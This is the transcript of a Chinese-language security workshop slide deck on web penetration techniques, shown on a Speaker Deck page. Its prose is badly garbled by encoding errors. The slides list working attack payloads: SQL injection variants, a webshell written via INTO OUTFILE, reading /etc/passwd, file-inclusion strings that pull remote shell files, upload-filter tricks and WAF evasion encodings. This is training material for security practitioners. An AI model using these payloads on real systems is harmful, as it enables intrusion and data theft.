Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web滲透技巧(下)
Search
Lionbug
October 01, 2016
Research
0
660
Web滲透技巧(下)
The Declaration of Hacker (TDOH) WorkShop
Lionbug
October 01, 2016
Tweet
Share
More Decks by Lionbug
See All by Lionbug
Privacy and Security
lionbug
0
210
Web滲透技巧(上)
lionbug
1
360
Other Decks in Research
See All in Research
VAR モデルによる OSS プロジェクト同士が生存性に与える 影響の分析
noppoman
0
140
東工大Swallowプロジェクトにおける大規模日本語Webコーパスの構築
aya_se
13
6.9k
ゼロからわかるリザバーコンピューティング
kurotaky
1
320
Deep State Space Models 101 / Mamba
kurita
9
3.6k
[Human-AI Decision Making勉強会] 説明の更新はユーザにどのような影響をもたらすか
okoso
1
210
クロスモーダル表現学習の研究動向: 音声関連を中心として
ryomasumura
3
620
第12回全日本コンピュータビジョン勉強会:画像の自己教師あり学習における大規模データセット
naok615
0
530
Accurate Method and Variable Tracking in Commit History
tsantalis
0
280
10-ot-generic-bio.pdf
gpeyre
0
140
オープンな日本語埋め込みモデルの選択肢 / Exploring Publicly Available Japanese Embedding Models
nttcom
14
5.8k
言語間転移学習で大規模言語モデルを賢くする
ikuyamada
8
3.6k
Julia Tokyo #11 トーク: 「Juliaで歩く自動微分」
abap34
2
1.3k
Featured
See All Featured
Learning to Love Humans: Emotional Interface Design
aarron
267
39k
Making Projects Easy
brettharned
109
5.5k
No one is an island. Learnings from fostering a developers community.
thoeni
16
2.1k
Building Adaptive Systems
keathley
32
1.9k
Keith and Marios Guide to Fast Websites
keithpitt
408
22k
Save Time (by Creating Custom Rails Generators)
garrettdimon
PRO
0
35
KATA
mclloyd
16
12k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
22
1.4k
Creatively Recalculating Your Daily Design Routine
revolveconf
211
11k
Embracing the Ebb and Flow
colly
80
4.2k
We Have a Design System, Now What?
morganepeng
43
6.8k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
22
1.6k
Transcript
Web佒蝚ದૣ(Ӥ) ӥ 2016/10/01 @ TDOH WorkShop LionBug
About Me • 讙紣Ռ̴a.k.a̴LionBug • 褾ੜ of TDOH • Co-founder
of UCCU • Know a little • Web Security
蝱褩笙၏ڥአ
SQL Injection
SQL Injection 脒慁ৼ • Union Based • Error Based •
Blind Based • Time Based
SQL Injection ဳ獈֖ᗝ • WHERE id = 1 • WHERE
id = ‘1’ • WHERE id = “1”
ڣ䥁虻碘䓚ੜದૣ • MySQL物version() • MSSQL物@@version • Oracle物v$version (Table) • SQLite物sqlite_version()
ଉአ犤 • MySQL物version()牏user()牏database() • SQLite物sqlite_version() • MSSQL物@@version牏user牏db_name()
UNION Based • UNION 瞲犤ጱፓጱฎ疥獋㮆 SQL 承 ݙጱ奾ຎݳ㬫蚏㬵牐 • 䳱֖碍ᥝፘݶ
• union select 1, 2 ,3
ੜದૣ • order by 1 • order by 100 •
…
ဳԪ殻 • MySQL牏SQLite ᛔ㵕旉矦ࣳ眲 • MSSQL牏Orcale ࣳ眲殾ፘݶ • …
Blind Based • 蝚螂 True False 叨ኞጱ犋ݶ奾ຎ㬵 ڣ䥁 •
and 1=1 • and 1=0
Blind Based • SELECT * FROM news WHERE id =
1 and (SELECT length(username) FROM member LIMIT 1)=1 • SELECT * FROM news WHERE id = 1 and (SELECT length(username) FROM member LIMIT 1)=2
Blind Based •SELECT * FROM news WHERE id = 1
and (SELECT substr(username,1,1) FROM member LIMIT 1)=‘a’ •SELECT * FROM news WHERE id = 1 and (SELECT substr(username,1,1) FROM member LIMIT 1)=‘b’
Time Based • 蝚螂ࢧ䛑碻樌ڣ䥁 • sleep • IF(MID(user(),1,1) = 'r',
SLEEP(5), 0) • Heavy • BENCHMARK(100000000, rand())
Error Based • 蝚螂梊藮懱௳玲虻碘 • ExtractValue(1,concat(0x7e,version())) • XPATH syntax error:
‘~5.5'
SQL Injection 磧य़玕 • INTO OUTFIEL ‘/var/www/shell.php’ • LOAD_FILE(‘/etc/passwd’)
PHP SQL Injection ڥአ • ଉአ螂筪獢碍 • addslashes() • mysql_escape_string()
• mysql_real_escape_string() • magic_quotes_gpc = On • php4, php<5.2.1 磪犚㺔氂
獢碍穉斃
PHP SQL Injection ڥአ • Select user From member Where
id = 123 • 1 or 1=1 %23
䋿ֺ
PHP SQL Injection ڥአ • 裾ଶ౼䥁 • ᩻螂10֖ز౼䥁 • adminxxxx’
=> adminxxxx\’ => adminxxxx\ • where username = ‘adminxxxx\’
䲆ݷ褖ګӤ㯽
媅螂篷ဩӤ㯽.PHP • .php3 .php4 .phtml • nginx iis 蟴ᗝ梊藮
• http://lionbug.tw/123.jpg/1.php • .htaccess
Local File Inclusion ڥአ磧य़玕
Local File Inclusion • include($_GET[‘file’]); • RCE • ?file=php://input •
?file=expect://ls • RFI • ?file=http://lionbug.tw/shell.txt
Local File Inclusion • include($_GET[‘file’].’php’); • RCE • ?file=\\192.168.100.1\1.php •
RFI • ?file=http://lionbug.tw/shell.php
LFI + Upload 奲ݳದ
LFI + Upload • 䲆礯犋胼ᤩ旉矦 • include.php?file=upload/123.jpg • include.php?file=../../upload/123.jpg
LFI + PHPINFO 奲ݳದ
LFI + PHPINFO • php upload 秚ګ • [tmp_name] =>
/tmp/phpGvjUMn • ?file=/tmp/phpGvjUMn • 皤螛㳫ᴻ碻樌
PHPINFO
App ሴێਡ - ݚӞ㮆ॠ璤
App 蝖ݻ • beta.lionbug.tw • 梊藮debug๚橕樂 • Facebook้粁螂᯿ᗝPINูێᏈ薹 • 战ग़WEB笙၏ๅฃڊ匍
• 褲萢API
App 蝖ݻ • ّ膑粚 • /v2/login • /v1/login <- 盛懿狒虁
• …
WAF web application firewall
CloudFlare
360
ਞ獊ᇸ
ඊ℃
WAF • DNS WAF(CloudFlare) • 戔猋ጱWAF • 敟誢ጱWAF(ਞ獊ᇸ, 360 …)
• …
篷脲䲒介य़ဩ • 篷ࢧ䛑 • 䲒介ک硭䢗 • ᤩ旉᪡ • …
Bypass WAF 媅Ջ讕媅ፗ矑Ԇ秚
᪡螂 DNS WAF • IP • Google • DNS history
• 虻懱丽笙 • ูێဩ • 综膐IP • DDoS
᪡螂 DNS WAF • 獉翕硭䢗 • 礍戔๐率ࣁ獉蟂 • ڥአ笙၏ •
SSRF(Server-side Request Forgery) • …
ඊ℃
Bypass WAF 蝢አ • TCP 瞥۱ • 咳᩻य़۱ • 1
and 111…111 • ୵㶧捍 • य़ੜ䌃磦矦 • SeLECt 1 FroM …
Bypass WAF 蝢አ • 㷢碍礕 • PHP/Apache, par1=var2 • a=1&a=1
or 1 • JSP/Tomcat, par1=var1 • ASP/IIS, par1=var1,var2 • a=1’&a=or 1—
Bypass WAF 蝢አ • 承粬 • Null Byte • a=%00’
or ‘1 • ྋ憒蔭螈ୗ㻌ᤈ玚蟴 • /r /n • a=%0a’ or ‘1
Bypass WAF 蝢አ • 翥嘨媅螂 • Urlencode • Unicode •
Ӿ翥嘨
Ӿਁ媅螂 Web Hacking Ӿጱ॰ದ窸ૣ Orange http://hitcon.org/2015/CMT/download/day1-c-r0.pdf
MySQL Bypass WAF
MySQL Bypass WAF • 绚ጮ磦矦 • select%0auser%0dfrom%09member • select(user)from(member) •
select+user+from+member
MySQL Bypass WAF • 戢薹 • select/**/user/**/from/**/member • /*!5000select 1*/
• admin where id=1`xxxx
MySQL Bypass WAF • 磦矦 • CONCAT -> CONCAT_WS •
‘/etc/passwd' -> 0x2f6574632f706173737764 • 1=1 -> 1>0 • 1=1 -> 1
Upload Bypass WAF
㷢碍礕(1)
㷢碍礕(2)
୵㶧捍(1)
Upload Bypass WAF • ୵㶧捍(2) • filename=123.php • filename=‘123.php’ •
filename=“123.jpg • 犋ݶContent-Type • application/x-www-form-urlencoded • multipart/form-data
Upload Bypass WAF • ीے篷嬝獉 • a=य़䲆礯, file=123.php
Other Bypass WAF
Other Bypass WAF • LFI • ../../ • .//../././../
篷አੜದ胼 • User-Agent: sqlmap • ֦䨝咳匍盄ग़翕ᒊӤ犋݄ XDD
Q & A